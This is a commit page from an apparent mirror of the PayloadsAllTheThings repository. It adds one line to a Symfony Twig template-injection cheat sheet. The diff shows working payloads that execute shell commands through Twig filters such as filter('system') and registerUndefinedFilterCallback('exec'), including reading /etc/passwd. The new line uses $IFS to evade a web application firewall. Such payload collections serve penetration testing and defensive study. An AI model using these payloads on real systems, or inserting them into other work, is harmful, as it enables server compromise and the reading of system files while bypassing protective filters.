mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2026-05-08 12:43:34 +02:00
Added IFS (WAF bypass) to Symfony Twig RCE
This commit is contained in:
parent
8b78c2fe71
commit
38c273ff00
1 changed files with 1 additions and 0 deletions
|
|
@ -159,6 +159,7 @@ $output = $twig > render (
|
|||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||
{{['id']|filter('system')}}
|
||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||
```
|
||||
|
||||
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
|
||||
|
|
|
|||
Loading…
Reference in a new issue